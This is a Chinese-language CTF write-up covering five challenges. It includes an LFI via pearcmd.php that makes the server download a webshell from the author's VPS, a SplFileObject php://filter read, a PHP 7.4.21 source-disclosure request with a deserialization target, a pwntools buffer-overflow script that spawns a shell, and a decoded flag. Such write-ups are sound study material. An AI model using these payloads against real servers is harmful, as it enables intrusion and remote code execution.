简单玩了一下,挺好玩的比赛,也学到很多知识,

🐎一个做题记录,后期把没来的做的题再复现一下。

0x00 ezinclude

包含主页时发现有pearcmd.php:

pear会在pearcmd.php获取命令行参数,存在pearcmd.php,说明该环境安装了pear。

php的pear扩展是一个命令行扩展管理工具,默认的安装路径在/usr/local/lib/php/pearcmd.php,在命令行下可以用pearphp /usr/local/lib/php/pearcmd.php运行,虽然不是在web的目录下,但是如果存在文件包含漏洞,就可以运行这个命令行工具。

把🐎写在自己的VPS里,让其远程下载即可。

利用方式:

sdpc=/usr/local/lib/php/pearcmd.php&+install+-R+/tmp+http://<ip>/8848.php

传参?sdpc=/tmp/tmp/pear/download/8848.php,蚁🗡连接成功,flag在/var/www/public/flag.php中。

0x01 ezphp

<?php
error_reporting(0);
highlight_file(__FILE__);
$g = $_GET['g'];
$t = $_GET['t'];
echo new $g($t);

看见echo new $g($t);可能是考察原生类利用,考虑使用SplFileObject类。

通过echo触发SplFileObject中的__toString()方法。

?g=SplFileObject&t=php://filter/read=convert.base64-encode/resource=flag.php

学习更多:戳我

0x02 funnyPHP

PHP <= 7.4.21远程源码泄露漏洞

勾掉Content-Length:

发包:

GET /puzzle.php HTTP/1.1
Host: 47.104.14.160:3345

GET / HTTP/1.1

得到puzzle.php的源码:

<?php
error_reporting(0);

class A{
    public $sdpc = ["welcome" => "yeah, something hidden."];

    function __call($name, $arguments)
    {
        $this->$name[$name]();
    }

}


class B{
    public $a;

    function __construct()
    {
        $this->a = new A();
    }

    function __toString()
    {
        echo $this->a->sdpc["welcome"];
    }

}

class C{
    public $b;
    protected $c;

    function __construct(){
        $this->c = new B();
    }

    function __destruct(){
        $this->b ? $this->c->sdpc('welcom') : 'welcome!'.$this->c;
    }
}

class Evil{
    function getflag() {
        echo file_get_contents('/fl4g');
    }
}


if(isset($_POST['sdpc'])) {
    unserialize($_POST['sdpc']);
} else {
    serialize(new C());
}


?>

又来了,恶心的反序列化泡泡龙> <。

0x03 ez_stack

main:

int __cdecl v(int a1)
{
  char s[68]; // [esp+0h] [ebp-48h] BYREF

  io();
  printf("Password reset 2.0 : ");
  gets(s);
  if ( a1 != -20221119 )
    return puts(asc_804A02E);
  puts(asc_804A01E);
  return system("/bin/sh");
}

分析代码得知,要想执行return system("/bin/sh"),需要让a1等于-20221119。

cmp处的text段地址为080492B3,溢出后下断点调试:

from pwn import *

io = process("./ez_stack")
gdb.attach(io,"b * 0x80492B3")
sleep(1)
io.recvuntil("Password reset 2.0 : ")
payload = cyclic(100)
io.sendline(payload)

io.interactive()

查看ebp+0x8的位置,cyclic -l 0x61616175得知其在81位(前面有80个字符)。

from pwn import *

io = remote('1.13.251.106','8000')
#io = process("./ez_stack")
#gdb.attach(io,"b * 0x80492B3")
#sleep(1)
io.recvuntil("Password reset 2.0 : ")
payload = 'a'*80+p32(0xfecb7341)
io.sendline(payload)

io.interactive()

0x04 CheckIn

282422904082982258621075610259452215824075271484821245626055284049965141753838118483499225118037659155776469308266679236514939371151200503486860900710638249138056870980395564136760046944176702722154502092895865522544199762580857041717582699398798829888596539858995029585412945532785867079274113878154724845910389733183058666310229884356997245

转成16进制:

4d752e4368656e5f69735f7468655f6d6f73745f68616e64736f6d655f626f795f696e5f534450435f616e645f68655f646f6e27745f686176655f6769726c667269656e642121212121212142795f7468655f7761795f686572655f69735f796f75725f666c61677b37303562633765612d653965312d343939362d613238662d6464393632613737373137307d

再转为字符:

Mu.Chen_is_the_most_handsome_boy_in_SDPC_and_he_don't_have_girlfriend!!!!!!!By_the_way_here_is_your_flag{705bc7ea-e9e1-4996-a28f-dd962a777170}